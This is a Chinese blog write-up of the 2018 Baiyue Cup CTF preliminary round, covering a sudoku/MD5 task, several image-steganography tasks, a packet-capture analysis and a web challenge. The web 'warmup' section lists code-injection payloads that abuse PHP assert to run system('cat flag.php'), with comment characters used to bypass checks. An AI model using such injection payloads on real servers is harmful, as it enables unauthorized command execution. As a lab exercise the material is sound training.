美文网首页CTF比赛解题报告整理
第四届“百越杯”福建省高校网络空间安全大赛初赛writeup

第四届“百越杯”福建省高校网络空间安全大赛初赛writeup

作者: 蓝小俊 | 来源:发表于2018-12-06 23:02 被阅读210次

    比赛时间:2018年12月01日 09:00 - 18:00
    比赛地址:https://race.ichunqiu.com/byb

    签到

    • 题目描述 签到.png
    • 解题思路
      解出数独,将解密后的81位数字按照从左到右、从上到下的顺序记录并进行md5加密即为flag
    • 解题步骤
      1.求解数独 推荐:http://www.llang.net/sudoku/calsudoku.html
      解数独.png 2.md5加密
      MD5加密.png
    a="473615928216984753598237164651892437942376815387451296834529671125768349769143582"
    from hashlib import md5
    print('flag{'+md5(a).hexdigest()+'}')  //hexdigest返回的是16进制的str形式
    #flag{cee3860fb3f4a52e615fa8aaf3c91f2b}
    
    • FLAG值:
    flag{cee3860fb3f4a52e615fa8aaf3c91f2b}
    

    Misc

    马男波杰克

    • 题目描述 马男波杰克.png
    • 解题思路
      由图片 atool 名字可知是 atool 图片隐写

    • 解题步骤
      百度 atool 在线解密,上传图片可解得 flag
      网址:http://www.atool.org/steganography.php

      解密.png
    • FLAG值:

    flag{jioiuojoi666}
    

    血小板天下第一可爱

    • 题目描述 图片.png
    • 解题思路
      将二维码修复LSB隐写

    • 解题步骤
      1.打开压缩包发现一张破损的二维码图片和一张 png 图片
      2.用PS截左下角来补齐上边两个角修复二维码,扫描并将结果 base64 解密,在进行URL得到 key 数据:key: Lsb_1s_gr3at


      修复后的二维码.png
      base64解密.png

      3.使用命令:python lsb.py extract 1.png 1.txt Lsb_1s_gr3at,恢复出 flag
      LSB隐写脚本:https://github.com/cyberinc/cloacked-pixel
      隐写技巧:PNG文件中的LSB隐写 - 嘶吼 RoarTalk – 回归最本质的信息安全,互联网安全新媒体,4hou.com http://www.4hou.com/technology/2515.html

    lsb隐写.png 命令说明.png 解密.png
    • FLAG值:
    flag{1_l0ve_LSB~}
    

    flag_universe

    • 题目描述 题目.png
    • 解题思路
      1.数据包抓取的是一段 ftp 协议通讯的流量, 其中涉及两个 ip ,172.1.0.1是服务器的 ip , 172.1.0.2是客户端的 ip 。流量过程中涉及多次图片上传下载的操作,而且都是对同一张图片进行操作
      2.分析流量可以发现客户端多次下载了文件名为 universe.png 的图片,而且只上传了一次叫做 new_universe.png 的图片,两张图片看起来完全一样,不过第二张图片的大小会稍大一些。通过 wireshark 筛选出上传的数据包,并且导出图片文件
      3.导出文件后我们用 StegSolve 的 analyse data extract 功能可以看到图片通过 lsb 方法隐写的文本信息,即可获得 flag
    • 解题步骤

      1.分析数据流,可以发现第十四个png图片也就是new_universe.png有点异常 tcp流.png 2.导出图片,图片隐写分析
      隐写分析.png
      另外解法:安装:gem install zsteg zsteg.png
    • FLAG值:
    flag{Plate_err_klaus_Mail_Life}
    

    WEB

    warmup

    • 题目描述 warmup.png
    • 解题思路
      web基础绕过,通过注释符或者结束符绕过
    • 解题步骤

      1.代码审计 index.png
      2.审计发现assert可以进行任意代码执行,但需要绕过后半部分的判断,我们可以通过结束符或注释符使后半部分被注释掉,即可执行命令
    /?u=Hello World&i=system('cat flag.php');//
    /?u=Hello World&i=system('cat flag.php');%23
    /?u=Hello World&i=highlight_file('flag.php');?>
    /?u=Hello World&i=highlight_file('flag.php');//
    
    当前文件夹.png

    simple ser

    • 题目描述


      simple ser.png

      未完待续。。。。

    相关文章

      网友评论

        本文标题:第四届“百越杯”福建省高校网络空间安全大赛初赛writeup

        本文链接:https://www.haomeiwen.com/subject/wdmacqtx.html